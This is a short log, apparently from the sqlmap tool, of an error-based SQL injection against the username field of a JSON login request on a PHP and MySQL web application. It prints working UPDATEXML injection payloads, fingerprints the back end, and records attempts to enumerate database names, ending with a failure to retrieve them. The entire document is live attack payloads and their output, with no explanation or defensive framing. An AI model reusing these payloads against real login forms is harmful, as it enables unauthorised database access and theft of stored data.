Parameter: JSON #1* ((custom) POST)
    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY cl
ause (UPDATEXML)
    Payload: {"username":"test' AND UPDATEXML(7256,CONCAT(0x2e,0x716a7a7071,(SEL
ECT (ELT(7256=7256,1))),0x71627a7671),5155) AND 'kFiU'='kFiU","password":"test"}

    Vector: AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[D
ELIMITER_STOP]'),[RANDNUM1])
---
[12:20:48] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.2.34
back-end DBMS: MySQL >= 5.1
[12:20:48] [INFO] fetching database names
[12:20:48] [PAYLOAD] test' AND UPDATEXML(3717,CONCAT(0x2e,0x716a7a7071,(SELECT C
OUNT(schema_name) FROM INFORMATION_SCHEMA.SCHEMATA),0x71627a7671),8364) AND 'Bbs
S'='BbsS
[12:20:49] [WARNING] the SQL query provided does not return any output
[12:20:49] [INFO] falling back to current database
[12:20:49] [INFO] fetching current database
[12:20:49] [PAYLOAD] test' AND UPDATEXML(9975,CONCAT(0x2e,0x716a7a7071,(MID((DAT
ABASE()),1,22)),0x71627a7671),9057) AND 'rvrx'='rvrx
[12:20:49] [DEBUG] performed 1 query in 0.65 seconds
[12:20:49] [CRITICAL] unable to retrieve the database names